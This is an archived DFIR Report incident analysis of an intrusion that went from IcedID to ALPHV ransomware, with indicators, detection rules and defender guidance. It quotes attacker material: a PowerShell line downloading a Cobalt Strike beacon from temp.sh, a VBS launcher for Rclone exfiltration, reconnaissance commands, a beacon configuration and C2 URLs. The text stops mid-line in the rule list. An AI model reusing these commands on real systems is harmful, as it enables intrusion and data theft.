{
	"id": "b02502ec-e9f7-466d-a1fd-8f0774a4110c",
	"created_at": "2026-04-06T00:08:40.637442Z",
	"updated_at": "2026-04-10T03:33:38.103765Z",
	"deleted_at": null,
	"sha1_hash": "d2f3594bc3abe99b58c93498d4a80b3a84308728",
	"title": "IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment - The DFIR Report",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4955950,
	"plain_text": "IcedID Brings ScreenConnect and CSharp Streamer to ALPHV\r\nRansomware Deployment - The DFIR Report\r\nBy editor\r\nPublished: 2024-06-10 · Archived: 2026-04-05 15:26:02 UTC\r\nKey Takeaways\r\nIn October 2023, we observed an intrusion that began with a spam campaign distributing a forked IcedID loader.\r\nThe threat actor used Impacket’s wmiexec and RDP to install ScreenConnect on multiple systems, enabling them to\r\nexecute various commands and deploy Cobalt Strike beacons.\r\nTheir toolkit also included CSharp Streamer, a RAT written in CSharp with numerous functionalities, as documented\r\nhere.\r\nThe attacker used a custom tool to stage data, then exfiltrated it using Rclone.\r\nEight days after initial access, ALPHV ransomware was deployed across all domain joined Windows systems.\r\nAn audio version of this report can be found on Spotify, Apple, YouTube, Audible, \u0026 Amazon.\r\nThe DFIR Report Services\r\n→ Click here to access the DFIR Lab related to this report ←\r\nFive new Sigma rules were created from this report and added to our Private Sigma Rules.\r\nOur Threat Feed was tracking the Cobalt Strike server used in this case days before the intrusion.\r\nPrivate Threat Briefs: Over 25 private reports annually, such as this one but more concise and quickly published\r\npost-intrusion.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, long-term tracking,\r\ndata clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 100+ Sigma rules derived from 40+ cases, mapped to ATT\u0026CK with test\r\nexamples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions. 
Interactive labs\r\nare available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds.\r\nContact us today for a demo!\r\nTable of Contents:\r\nCase Summary\r\nThe DFIR Report Services\r\nAnalysts\r\nInitial Access\r\nExecution\r\nPersistence\r\nPrivilege Escalation\r\nDefense Evasion\r\nCredential Access\r\nDiscovery\r\nLateral Movement\r\nCollection\r\nCommand and Control\r\nExfiltration\r\nImpact\r\nTimeline\r\nDiamond Model\r\nIndicators\r\nDetections\r\nMITRE ATT\u0026CK\r\nCase Summary\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 1 of 30\n\nThis intrusion began in October 2023 with a malicious email that enticed the recipient to download a zip archive containing\r\na Visual Basic Script (VBS) and a benign README file. We assess with high confidence that this email was part of a spam\r\ncampaign delivering a forked variant of IcedID. First reported by ProofPoint in February 2023, this forked IcedID variant\r\nlacks banking functionality and prioritizes payload delivery. Upon user interaction with the archive’s contents, the VBS file\r\nwas executed, initiating the embedded forked IcedID loader.\r\nThis was followed by the creation of a scheduled task to maintain persistence on the beachhead. The forked IcedID loader\r\nthen communicated with a command and control server, leading to the dropping and execution of another IcedID DLL.\r\nApproximately two minutes after execution, the first round of discovery was observed using Windows native binaries,\r\nmirroring the activity seen in previously reported IcedID cases.\r\nAround two hours into the intrusion, the threat actor installed ScreenConnect on the beachhead using a renamed installer\r\nbinary, “toovey.exe.” They executed multiple commands on the host via ScreenConnect. These commands included\r\nWindows utilities such as nltest and net for reconnaissance. 
They also used PowerShell cradles, bitsadmin, and certutil to\r\nattempt retrieval of Cobalt Strike beacons on the beachhead. They had a few stumbles while trying to download the Cobalt\r\nStrike beacons using temp.sh, resulting in downloading the HTML of the website rather than their intended payload file.\r\nOnce the Cobalt Strike beacons were executed, they established communication with the Cobalt Strike command and\r\ncontrol server. Within 20 minutes of this activity, a new payload, cslite.exe (CSharp Streamer C2), was dropped on the\r\nbeachhead. CSharp Streamer is a multi-function remote access trojan that was first reported in 2021. During this intrusion, it\r\nwas first used to access the LSASS process on the beachhead for credential access, and around 40 minutes after that, the\r\nthreat actor performed a dcsync operation from the beachhead host to one of the domain controllers. The threat actor then\r\ncopied a renamed ScreenConnect installer from the beachhead to a domain controller over SMB. The installation was\r\ncompleted using Impacket’s wmiexec script to remotely run the ScreenConnect installer.\r\nAfter installing ScreenConnect, we observed a login to the domain controller via ScreenConnect to access the host.\r\nDuring this session, the threat actor dropped several CSharp Streamer payloads. Although they executed the files, we did not\r\nobserve any network traffic to a command and control server at that time. Activity then ceased for approximately eight\r\nhours.\r\nOn the second day, the threat actor returned and performed network discovery on the domain controller using SoftPerfect’s\r\nnetwork scanner. They then initiated an RDP connection from the domain controller to a backup server. The threat actor\r\nreviewed backups and running processes before dropping both a CSharp Streamer binary and a previously used\r\nScreenConnect installer. These were then executed over the RDP session. 
Next, a Cobalt Strike beacon was run, and LSASS\r\nwas accessed on the host.\r\nAround eleven hours later, the threat actor dropped several Cobalt Strike beacons and attempted to execute them; however,\r\nno new command and control traffic was observed. The threat actor quickly removed the files. Four hours later, another\r\nScreenConnect installer was dropped on the backup server and executed using wmiexec. A new RDP connection was then\r\ninitiated to a second domain controller, and netscan was run again. Following this, ScreenConnect was installed on the\r\nsecond domain controller, and an RDP session was started from this domain controller to a file server. On the file server,\r\nboth a Cobalt Strike beacon and the ScreenConnect installer were dropped and executed via the RDP session.\r\nAfter three days of no significant activity, the threat actor returned. They dropped and executed a new ScreenConnect\r\ninstaller on the backup server via wmiexec and ran netscan again. Using RDP, they connected to the file server and used\r\nMozilla Firefox to preview a few financial documents before running netscan there as well.\r\nThe following day, a custom tool named “confucius_cpp” was dropped on the file server. Its functionalities included\r\naggregation, staging, and compression of sensitive files. We observed the threat actor performing Google searches for the\r\nkeyword “rclone” and subsequently downloading the rclone application on the file server. Instead of direct execution, the\r\nRclone binary was started using a VBS script. Upon execution of this script, the previously staged data was successfully\r\nexfiltrated using Rclone to a remote server.\r\nOn day seven of the intrusion, an RDP connection was initiated from the beachhead to the backup and the file server using\r\nCSharp Streamer. 
New ScreenConnect installers appeared yet again and followed the same WMI execution pattern as before.\r\nOn the final day of the intrusion, the threat actor proceeded to push toward their final objectives. From the backup server,\r\nthey ran a fresh netscan sweep and began staging both a ScreenConnect installer and an ALPHV ransomware binary. First,\r\nthey used xcopy to stage the ScreenConnect installer across all Windows hosts in the domain and then executed it using a\r\nWMI command. This was then repeated for the ALPHV ransomware payload. During the execution, we observed the threat\r\nactor deleting all the backups interactively. Upon completion of the ransomware execution, a ransom note was left behind on\r\nthe hosts. The time to ransomware (TTR) was around 180 hours, over the course of 8 days.\r\nIf you would like to get an email when we publish a new report, please subscribe here.\r\nAnalysts\r\nAnalysis and reporting completed by @yatinwad, and UC2.\r\nInitial Access\r\nInitial access began with a malicious e-mail. The malicious spam campaign can be linked to a publicly reported campaign\r\nfrom @JAMESWT_MHT encouraging victims to download and open a ZIP archive.\r\nOnce the ZIP file was extracted, the user was presented with a Readme and a Visual Basic Script (VBS) file.\r\nWScript.exe was called when executing the script, which starts the infection.\r\nThe script embeds a slightly obfuscated, base64-encoded DLL, saves it to C:\\Windows\\Temp\\0370-1.dll and\r\nthen executes that DLL through regsvr32.\r\nThis DLL is an IcedID loader as observed with sandboxing here. 
The infection chain was concluded by the loader dropping\r\nand executing another IcedID DLL via rundll32.\r\nExecution\r\nScreenConnect\r\nOnce IcedID was operational, the threat actor used it to install the RMM tool ScreenConnect, renamed as toovey.exe.\r\nThroughout the intrusion the threat actor dropped several more renamed ScreenConnect installers, usually copied to a new host\r\nafter moving laterally and then executed through Impacket’s wmiexec.py script:\r\nBesides execution with wmiexec.py, some installers were executed during the threat actor’s RDP sessions:\r\nScreenConnect was then used to execute various commands. This can be observed in logs, as ScreenConnect drops the\r\ndesired script on disk, followed by the corresponding interpreter, as discussed in a previous report. This can be seen in\r\nvarious events, such as Security Event ID 4688 or Sysmon Event 1, as displayed below.\r\nCobalt Strike\r\nAs in most intrusions we document, Cobalt Strike beacons were used in this intrusion. On the beachhead host, using\r\nScreenConnect, the threat actor tried to download malicious Cobalt Strike beacons using bitsadmin, without success.\r\nBesides process creation event logs, bitsadmin downloads can also be detected via event IDs 59 and 60 of the “Microsoft-Windows-Bits-Client/Operational” log.\r\nFollowing this failure, they used another LOLBin named certutil to download their payloads, again via ScreenConnect. This\r\nbehavior was repeated to download other Cobalt Strike beacons.\r\nPowerShell was another tool used to retrieve Cobalt Strike beacons, again with some failures, and yet again using\r\nScreenConnect.\r\nIn addition to the previously mentioned methods of retrieving additional payloads, there was another instance where the\r\nattackers used temp.sh to host their malware. 
However, the download fails when attempting to directly retrieve a file from\r\nthese links: instead of the actual file, the client downloads an HTML presentation page that prompts the visitor to\r\nclick a link to retrieve the file.\r\npowershell Invoke-WebRequest \"http://temp.sh/VSlAV/http64.exe\" -OutFile C:\\programdata\\rr.exe\r\nOn another occasion, PowerShell usage was successful, and in those cases, using Sysmon’s events, we can trace child\r\nprocesses from the PowerShell ParentCommandLine. For instance, the following display shows a payload used to launch\r\nhttps64.dll, another Cobalt Strike beacon.\r\nBecause the beacon was using plain HTTP, the retrieved PowerShell payload can be extracted from the network\r\ncommunications.\r\nAs documented in Cobalt Strike, a Defender’s Guide part 1 and part 2, the attackers used Cobalt Strike’s default pipe names,\r\nwhich can be easily detected.\r\nImpacket\r\nAs part of their toolkit, the threat actor used Impacket’s wmiexec.py script to perform actions. This activity can be easily\r\nobserved in logs because of the default redirect of its output to \\\\127.0.0.1\\ADMIN$\\__%timestamp% (as visible in\r\nthe source code).\r\nCSharp Streamer\r\nDuring the intrusion, the threat actor deployed a binary named “cslite.exe” on the beachhead host. Upon investigation, we\r\nidentified this binary as a RAT known as CSharp Streamer, thanks to an excellent write-up by Hendrik Eckardt. This\r\nmalware combines many different functions and is a very capable remote access trojan. 
During this intrusion, we observed it\r\ndumping credentials, proxying RDP traffic, and providing command and control communications for the threat actor.\r\nWe were able to confirm the tool using memory analysis and by identifying known functions and commands from the previously\r\nlinked report.\r\nWhen executed, the tool writes a .NET executable to the %USERPROFILE%\\AppData\\Local\\Temp folder using a .tmp\r\nextension and then loads it into memory, as seen in the Sysmon Event ID 7 event:\r\nUsing dynamic analysis from running the sample in a malware analysis sandbox, we can observe the injected .NET\r\nassemblies:\r\nPersistence\r\nIcedID\r\nIcedID registered a scheduled task for persistence, in the same manner as documented in several other reports.\r\nThe task was registered to be executed every hour after logon, as indicated respectively by the following XML tags:\r\n\u003cInterval\u003ePT1H\u003c/Interval\u003e\r\n\u003cLogonTrigger id=\"LogonTrigger\"\u003e\u003cEnabled\u003etrue\u003c/Enabled\u003e\u003c/LogonTrigger\u003e\r\nScreenConnect\r\nUpon installation, ScreenConnect persists across reboots with an auto-start service. 
This can be seen using the built-in\r\nSystem event logs (event ID 7045).\r\nShould the System event logs be unavailable (for instance if cleared by a threat actor), the service configuration is saved\r\ninside the SYSTEM registry file, which can be analyzed using Eric Zimmerman’s Registry Explorer tool, in\r\nthe HKLM\\CurrentControlSet\\Services\\ location.\r\nAnomali Threat Research explained the parameters in their article:\r\ne as session type, can be Support, Meeting, Access.\r\ny as process type, can be Guest or Host.\r\nh as the relay service’s URI.\r\np as the relay service’s port.\r\ns as a globally unique identifier for client identification.\r\nk as the encoded encryption key, used for identity verification.\r\nt as the optional session name.\r\nDefense Evasion\r\nUpon moving laterally to a backup server, we observed Cobalt Strike injection into the legitimate processes “winlogon.exe” and\r\n“rundll32.exe”.\r\nBy relying on memory captures, defenders may also have other detection methods. Here, by processing the acquired\r\nmemory with MemProcFS and using the findevil command, we can find an injected beacon in winlogon.exe.\r\nDuring the intrusion, the threat actor deleted the renamed ScreenConnect installers from the backup server and the file\r\nserver using the “del” command, in an attempt to cover their tracks.\r\nCredential Access\r\nCredentials were extracted from LSASS (Local Security Authority Subsystem Service), a technique commonly seen during similar\r\nintrusions. On day one, through hands-on activity, the threat actor executed cslite.exe (a CSharp Streamer file dropped on\r\nthe Desktop of a compromised user), which was used to access the LSASS process. 
Process access can be seen using\r\nSysmon event ID 10, as displayed below.\r\nMicrosoft documented the granted accesses, which are the following:\r\n0x1010: PROCESS_QUERY_LIMITED_INFORMATION (0x1000) and PROCESS_VM_READ (0x0010)\r\n0x1FFFFF: PROCESS_ALL_ACCESS\r\nAnother data point to look for is the UNKNOWN string in the CallTrace, which indicates Sysmon was not able to resolve\r\nthe address of the code from which the OpenProcess function was called, a potential indication of a DLL in memory.\r\nWe also were able to collect memory and scan it with various YARA rules, confirming the use of a Mimikatz\r\nimplementation with several rule hits for the cslite.exe memory space and file:\r\nIn another instance, we saw LSASS being accessed by WerFault.exe, with PROCESS_ALL_ACCESS granted. This should\r\nhappen rarely in a production environment, and once again the CallTrace can help: a CallTrace containing ntdll.dll,\r\ndbghelp.dll or dbgcore.dll (source 1, source 2) should be monitored.\r\nFinally, on the second day, we can see yet another access to LSASS, this time from rundll32.exe, once again using\r\naccess 0x1010 and with UNKNOWN in the CallTrace. This time, rundll32.exe was spawned by PowerShell, which was\r\ntasked to download and execute a Cobalt Strike beacon.\r\nAround 40 minutes after the LSASS dump by the “cslite.exe” executable, we observed a traffic spike from the beachhead\r\nhost to a domain controller. 
Reviewing this network traffic using the Suricata rules from Didier Stevens, we discovered\r\npotential Mimikatz dcsync activity between the hosts.\r\nAt the same time we found Event ID 4662 logs on the domain controller, confirming a sync operation requested by the\r\n“Administrator” account:\r\nSpecifically, to detect this dcsync activity we were looking for the Domain-DNS class (object), Schema GUID\r\n19195a5b-6da0-11d0-afd3-00c04fd930c9, and DS-Replication-Get-Changes-All, Schema GUID 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2, as\r\nexplained in this SpecterOps post. Using these two points of evidence, we can say with good\r\nconfidence that the threat actor performed a dcsync operation.\r\nDiscovery\r\nMinutes after the initial compromise, a first round of discovery was observed using native Windows built-in utilities,\r\nspawning from the IcedID malware.\r\ncmd.exe /c chcp \u003e\u00262\r\nipconfig /all\r\nsysteminfo\r\nnet config workstation\r\nnltest /domain_trusts\r\nnltest /domain_trusts /all_trusts\r\nnet view /all /domain\r\nnet view /all\r\nnet group \"Domain Admins\" /domain\r\nLater on, the threat actor used ScreenConnect to run other discovery commands, on several occasions:\r\nnltest /dclist:\r\nnet group \"domain admins\" /domain\r\nnet group \"Domain Computers\" /domain\r\nnet group \"domain admins\" /domain\r\nnet group \"enterprise admins\" /domain\r\nnltest /dclist:\r\nnet group \"domain admins\" /domain\r\nquser\r\nipconfig /all\r\nnet group \"domain computers\" /domain\r\nsysteminfo\r\nroute print\r\nnltest /dclist:\r\nOn day two, day five, and day eight, the threat actor performed rounds of network discovery using SoftPerfect netscan.\r\nEach time, the scan goes over the 
same IP address space, and scans for the ports 135 (RPC), 445 (SMB) and 3389 (RDP),\r\nwith a few extras related to the Veeam backup solution.\r\nLateral Movement\r\nThe renamed ScreenConnect installer was copied from the beachhead to domain controllers, a backup server, and a file\r\nserver using SMB. As explained in the execution section, the installer was also executed via Impacket’s wmiexec.py script,\r\nwhich resulted in the ScreenConnect installation. Multiple commands were executed on the compromised hosts via\r\nScreenConnect command functionality.\r\nEvent ID 5145 logs:\r\nRDP was used extensively during the intrusion by the threat actor to move laterally.\r\nWhile the threat actor most frequently used the native Windows RDP clients, on at least one occasion they proxied their\r\nRDP session via the CSharp Streamer.\r\nWhen doing this, they left a trace of their remote host name logged under Event ID 4778:\r\n77724F2\r\nCollection\r\nBefore initiating the exfiltration process, a custom tool called confucius_cpp.exe was dropped on a file server. 
This tool was\r\nused to aggregate, stage, and compress sensitive data files, using LDAP and creating multiple ZIP archives.\r\nAs seen when executing the tool in a lab environment, the LDAP query with search filter (\u0026(objectClass=computer)) is first\r\nmade to look for computers, as documented on the Microsoft Learn website.\r\nOnce the LDAP query is complete, the tool enumerates shared folders, filtering out some uninteresting folders such as\r\nNETLOGON or SYSVOL.\r\nOn each selected folder, the tool will look for files based on keywords (in the screenshot they’re after the\r\nwords security_reports and finance) before compressing data. This automates the collection phase, ensuring swift action\r\nacross the whole network.\r\nThe attacker also installed Firefox to preview a few documents. This can be seen by looking at the process command line,\r\nwhich contains the URL argument, as displayed below.\r\nCommand and Control\r\nThe threat actor leveraged the following methods to access the hosts within the network:\r\nIcedID\r\nCobalt Strike\r\nCSharp Streamer\r\nScreenConnect\r\nIcedID\r\nThe forked IcedID loader established connection to command and control server modalefastnow[.]com over port 443, which\r\nresolved at the time to 212.18.104.12. 
The contents of the network connection matched a malware rule in the Emerging\r\nThreats Open ruleset “ET MALWARE Win32/IcedID Request Cookie”.\r\nAfter the initial infection, the second stage IcedID DLL communicated with the following C2 servers:\r\nIP | Port | Domain | JA3 | JA3s\r\n173.255.204.62 | 443 | jkbarmossen[.]com | a0e9f5d64349fb13191bc781f81f42e1 | N/A\r\n94.232.46.27 | 443 | evinakortu[.]com | a0e9f5d64349fb13191bc781f81f42e1, 1138de370e523e824bbca92d049a3777 | N/A\r\n94.232.46.27 | 443 | hofsaalos[.]com | a0e9f5d64349fb13191bc781f81f42e1, 1138de370e523e824bbca92d049a3777 | N/A\r\n77.105.140.181 | 443 | jerryposter[.]com | a0e9f5d64349fb13191bc781f81f42e1 | ec74a5c51106f0419184d0dd08fb05bc\r\n77.105.142.135 | 443 | skrechelres[.]com | a0e9f5d64349fb13191bc781f81f42e1 | ec74a5c51106f0419184d0dd08fb05bc\r\n212.18.104.12 | 443 | modalefastnow[.]com | a0e9f5d64349fb13191bc781f81f42e1 | N/A\r\nja4: t12d190800_d83cc789557e_7af1ed941c26\r\nja4: t10d070700_c50f5591e341_c39ab67fec8e\r\nja4s: t120400_c030_12a20535f9be\r\nja4x: 96a6439c8f5c_96a6439c8f5c_795797892f9c\r\nCobalt Strike\r\nThe threat actor dropped Cobalt Strike beacons across hosts during the intrusion, communicating with the following IP\r\naddresses.\r\nIP | Port | Domain | JA3 | JA3s | AS Organization | ASN | Geolocation Country\r\n85.209.11.48 | 80 | N/A | N/A | N/A | Chang Way Technologies Co. Limited | 57523 | Russia\r\nThe DFIR Report threat intelligence feeds tracked this infrastructure as a live Cobalt Strike server starting 2023-09-29 through\r\n2023-10-30.\r\nThe following URIs were accessed for 85.209.11.48:\r\nUsing MemProcFS to process the memory from the backup server, we were able to extract the minidump for the injected\r\nCobalt Strike process. Using the minidump, the beacon configuration could be parsed using 1768.py:\r\nFile: minidump.dmp\r\nConfig found: xorkey b'.' 
0x00000000 0x00010000\r\n0x0001 payload type 0x0001 0x0002 0 windows-beacon_http-reverse_http\r\n0x0002 port 0x0001 0x0002 80\r\n0x0003 sleeptime 0x0002 0x0004 60000\r\n0x0004 maxgetsize 0x0002 0x0004 1048576\r\n0x0005 jitter 0x0001 0x0002 0\r\n0x0007 publickey 0x0003 0x0100 30819f300d06092a864886f70d010101050003818d00308189028181\r\n0x0008 server,get-uri 0x0003 0x0100 '85.209.11.48,/load'\r\n0x0043 DNS_STRATEGY 0x0001 0x0002 0\r\n0x0044 DNS_STRATEGY_ROTATE_SECONDS 0x0002 0x0004 -1\r\n0x0045 DNS_STRATEGY_FAIL_X 0x0002 0x0004 -1\r\n0x0046 DNS_STRATEGY_FAIL_SECONDS 0x0002 0x0004 -1\r\n0x000e SpawnTo 0x0003 0x0010 (NULL ...)\r\n0x001d spawnto_x86 0x0003 0x0040 '%windir%\\\\syswow64\\\\rundll32.exe'\r\n0x001e spawnto_x64 0x0003 0x0040 '%windir%\\\\sysnative\\\\rundll32.exe'\r\n0x001f CryptoScheme 0x0001 0x0002 0\r\n0x001a get-verb 0x0003 0x0010 'GET'\r\n0x001b post-verb 0x0003 0x0010 'POST'\r\n0x001c HttpPostChunk 0x0002 0x0004 0\r\n0x0025 license-id 0x0002 0x0004 1580103824 Stats uniques -\u003e ips/hostnames: 210 publickey\r\n0x0026 bStageCleanup 0x0001 0x0002 0\r\n0x0027 bCFGCaution 0x0001 0x0002 0\r\n0x0009 useragent 0x0003 0x0100 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trid\r\n0x000a post-uri 0x0003 0x0040 '/submit.php'\r\n0x000b Malleable_C2_Instructions 0x0003 0x0100\r\n Transform Input: [7:Input,4]\r\n Print\r\n0x000c http_get_header 0x0003 0x0200\r\n Build Metadata: [7:Metadata,3,6:Cookie]\r\n BASE64\r\n Header Cookie\r\n0x000d http_post_header 0x0003 0x0200\r\n Const_header Content-Type: application/octet-stream\r\n Build SessionId: [7:SessionId,5:id]\r\n Parameter id\r\n Build Output: [7:Output,4]\r\n Print\r\n0x0036 HostHeader 0x0003 0x0080 (NULL ...)\r\n0x0032 UsesCookies 0x0001 0x0002 1\r\n0x0023 proxy_type 0x0001 0x0002 2 IE settings\r\n0x003a TCP_FRAME_HEADER 0x0003 0x0080 '\\x00\\x04'\r\n0x0039 
SMB_FRAME_HEADER 0x0003 0x0080 '\\x00\\x04'\r\n0x0037 EXIT_FUNK 0x0001 0x0002 1\r\n0x0028 killdate 0x0002 0x0004 0\r\n0x0029 textSectionEnd 0x0002 0x0004 0\r\n0x002b process-inject-start-rwx 0x0001 0x0002 64 PAGE_EXECUTE_READWRITE\r\n0x002c process-inject-use-rwx 0x0001 0x0002 64 PAGE_EXECUTE_READWRITE\r\n0x002d process-inject-min_alloc 0x0002 0x0004 0\r\n0x002e process-inject-transform-x86 0x0003 0x0100 (NULL ...)\r\n0x002f process-inject-transform-x64 0x0003 0x0100 (NULL ...)\r\n0x0035 process-inject-stub 0x0003 0x0010 '\"+\\x8f\\'Ûßº\\x8dÝU\\x9eì¢~¦H'\r\n0x0033 process-inject-execute 0x0003 0x0080 '\\x01\\x02\\x03\\x04'\r\n0x0034 process-inject-allocation-method 0x0001 0x0002 0\r\n0x0000\r\nGuessing Cobalt Strike version: 4.3 (max 0x0046)\r\nSanity check Cobalt Strike config: OK\r\nSleep mask 64-bit 4.2 deobfuscation routine found: 0x005e2f3f\r\nSleep mask 64-bit 4.2 deobfuscation routine found: 0x00624b3f\r\nCSharp Streamer\r\nThe “cslite.exe” CSharp Streamer executable communicated to the IP address 109.236.80.191. During the intrusion, we\r\nobserved traffic to it across various ports, including 135, 139, 80, 443, and 3389. Most traffic was observed at 443 and 3389.\r\nLooking at the memory of the “cslite.exe” run in a sandbox, we can extract the configured communication preferences for\r\nthe trojan:\r\nThe malware uses WebSockets for communication, as observed with the wss:// in the URL. We also see that the\r\ncommunication was set up to use socket.io, to proxy the communication. 
If the malware cannot reach a specific port, it\r\nrotates through a list of various ports, likely to both evade ports blocked in the victim firewall and help obfuscate\r\ncommunication by changing the port in use throughout an intrusion.\r\nIP | Port | Domain | JA3 | JA3s | AS Organization\r\n109.236.80.191 | 443 | www.i2rtqyj[.]ekz | c12f54a3f91dc7bafd92cb59fe009a35 | 394441ab65754e2207b1e1b457b3641d | WorldStream B.V.\r\nja4: t12i210600_76e208dd3e22_2dae41c691ec\r\nja4s: t120200_c02f_ec53b3cc8a64\r\nja4s: t120400_c02f_12a20535f9be\r\nja4x: bbd6cc0fca29_4ce939b68fae_79faaa53868b\r\nDuring the intrusion, we observed several Zeek notice messages alerting on the self-signed certificate used by the CSharp\r\nStreamer command and control server.\r\nScreenConnect\r\nAfter the initial forked IcedID loader infection, the threat actor deployed ScreenConnect on the beachhead using a renamed\r\nbinary “toovey.exe”. Later, ScreenConnect was installed on multiple systems by dropping a renamed installer and executing it\r\nthrough Impacket’s wmiexec.py script.\r\nExfiltration\r\nWhile Firefox was used to preview documents, it was also used to download Rclone. When the process command line is not\r\navailable, defenders can look for web history artifacts. In Firefox, web history artifacts are well documented and can be\r\ndirectly looked at using an SQLite browser.\r\nRclone was dropped on the file server. 
This can be detected by looking at file creation, for instance using the event ID 11\r\nfrom Sysmon.\r\nRclone was not directly started, but was launched through a VBS script named nocmd.vbs, which itself executes rcl.bat,\r\nwhich in turn executes Rclone.\r\nSet WshShell = CreateObject(\"WScript.Shell\")\r\nWshShell.Run chr(34) \u0026 \"c:\\programdata\\rcl.bat\" \u0026 Chr(34), 0\r\nSet WshShell = Nothing\r\nBefore that, the threat actor used the Rclone config command, which performs the following action according to the\r\ndocumentation:\r\nenter an interactive configuration session where you can setup new remotes and manage existing ones\r\nUpon execution, network artifacts show an increase in egress traffic to the exfiltration server on port 22 (SSH). An increase in\r\negress traffic, especially to previously unknown hosts or on suspicious ports, can be used to detect early exfiltration attempts.\r\nBelow is a chart of traffic to port 22 over the whole course of this intrusion.\r\nExfiltration Server data:\r\nIP | Port | Domain | AS Organization | ASN | Geolocation Country\r\n217.23.12.8 | 22 | N/A | WorldStream B.V. | 49981 | Netherlands\r\nImpact\r\nOn the eighth day of the intrusion, the threat actor moved toward their final objective, deploying ALPHV Ransomware. This\r\nstarted with the threat actor staging two files on the backup server.\r\n“setup.exe,” which was dropped twice, was just the latest ScreenConnect installer the adversary employed during the\r\nintrusion. 
“BNUfUOmFT2.exe” was the ransomware binary.\r\nFirst, they used the xcopy Windows utility to copy the ScreenConnect installer across the domain to the root of C$:\r\nSecond, they remotely ran the installer on hosts using WMI commands:\r\nThird, they repeated the process, copying the ransomware payload from the backup server to the domain joined hosts in the\r\nnetwork.\r\nFinally, they used this same method to execute the ransomware remotely via WMI:\r\nOn the remote hosts, “WMIPrvSE.exe” was observed executing the task.\r\nDuring the ransomware deployment phase, we observed the threat actor deleting all the backups interactively.\r\nAfter completing the encryption of files, the following note was left on the infected hosts, with a call-out to review Twitter\r\nto associate the group:\r\nTimeline\r\nDiamond Model\r\nIndicators\r\nAtomic\r\nCobaltStrike\r\n85.209.11[.]48\r\nCSharp Streamer\r\n109.236.80[.]191\r\nData exfiltration\r\n217.23.12[.]8\r\nForked IcedID Loader\r\n212.18.104[.]12 / modalefastnow[.]com\r\n2nd Stage IcedID payload\r\n92.118.112[.]113 / hofsaalos[.]com\r\n173.255.204[.]62 / jkbarmossen[.]com\r\n94.232.46[.]27 / evinakortu[.]com\r\n77.105.140[.]181 / jerryposter[.]com\r\n77.105.142[.]135 / 
skrechelres[.]com\r\nURLs\r\nhttp[:]//85.209.11[.]48:80/download/test1.exe\r\nhttp[:]//85.209.11[.]48:80/download/http64.exe\r\nhttp[:]//85.209.11[.]48:80/download/csss.exe\r\nhttp[:]//85.209.11[.]48:80/ksajSk\r\nhttp[:]//85.209.11[.]48:80/ksaid\r\nhttp[:]//temp[.]sh/VSlAV/http64.exe\r\nComputed\r\nDetections\r\nNetwork\r\nET INFO Executable Download from dotted-quad Host\r\nETPRO HUNTING Windows BITS UA Retrieving EXE\r\nET HUNTING Suspicious BITS EXE DL From Dotted Quad\r\nET POLICY PE EXE or DLL Windows file download HTTP\r\nET HUNTING SUSPICIOUS Dotted Quad Host MZ Response\r\nETPRO HUNTING Windows BITS UA Retrieving EXE M2\r\nETPRO POLICY Observed MS Certutil User-Agent in HTTP Request\r\nETPRO MALWARE Likely Evil Certutil Retrieving EXE\r\nThreatFox payload delivery (domain - confidence level: 100%)\r\nET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile\r\nThreatFox Cobalt Strike botnet C2 traffic (ip:port - confidence level: 80%)\r\nET INFO Packed Executable Download\r\nET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1\r\nET MALWARE Cobalt Strike Beacon Observed\r\nET MALWARE Win32/IcedID Requesting Encoded Binary M4\r\nET MALWARE Win32/IcedID Request Cookie\r\nET SCAN Potential SSH Scan OUTBOUND\r\nSigma\r\nSearch rules on detection.fyi or sigmasearchengine.com\r\nDFIR Report Public Repo:\r\n8a0d153f-b4e4-4ea7-9335-892dfbe17221: NetScan Share Enumeration Write Access Check\r\ndfbdd206-6cf2-4db9-93a6-0b7e14d5f02f: CHCP CodePage Locale Lookup\r\nDFIR Report Private Repo:\r\n7019b8b4-d23e-4d35-b5fa-192ffb8cb3ee: Use of Rclone to exfiltrate data over an SSH channel\r\na09079c2-e4af-4963-84d2-d65c2fb332f5: Detection of CertUtil Misuse for Malicious File Download\r\n6f77de5c-27af-435b-b530-e2d07b77a980: 
Impacket Tool Execution\r\n6fc673ac-ec2f-4de8-8a14-a395f1b2b531: Potential CSharp Streamer RAT loading binary from APPDATA\r\n879ddba7-5cb9-484f-88a4-c1d87034166f: Suspicious ScreenConnect Script Execution\r\nSigma Repo:\r\n90f138c1-f578-4ac3-8c49-eecfd847c8b7: BITS Transfer Job Download From Direct IP\r\n10c14723-61c7-4c75-92ca-9af245723ad2: HackTool - Potential Impacket Lateral Movement Activity\r\nb1f73849-6329-4069-bc8f-78a604bb8b23: Remote Access Tool - ScreenConnect Remote Command Execution\r\n90b63c33-2b97-4631-a011-ceb0f47b77c3: Suspicious Execution From GUID Like Folder Names\r\n19b08b1c-861d-4e75-a1ef-ea0c1baf202b: Suspicious Download Via Certutil.EXE\r\nd059842b-6b9d-4ed1-b5c3-5b89143c6ede: File Download Via Bitsadmin\r\ne37db05d-d1f9-49c8-b464-cee1a4b11638: PUA - Rclone Execution\r\n7090adee-82e2-4269-bd59-80691e7c6338: Console CodePage Lookup Via CHCP\r\nd5601f8c-b26f-4ab0-9035-69e11a8d4ad2: CobaltStrike Named Pipe\r\nc8557060-9221-4448-8794-96320e6f3e74: Windows PowerShell User Agent\r\n1edff897-9146-48d2-9066-52e8d8f80a2f: Suspicious Invoke-WebRequest Execution With DirectIP\r\n0ef56343-059e-4cb6-adc1-4c3c967c5e46: Suspicious Execution of Systeminfo\r\n903076ff-f442-475a-b667-4f246bcc203b: Nltest.EXE Execution\r\n5cc90652-4cbd-4241-aa3b-4b462fa5a248: Potential Recon Activity Via 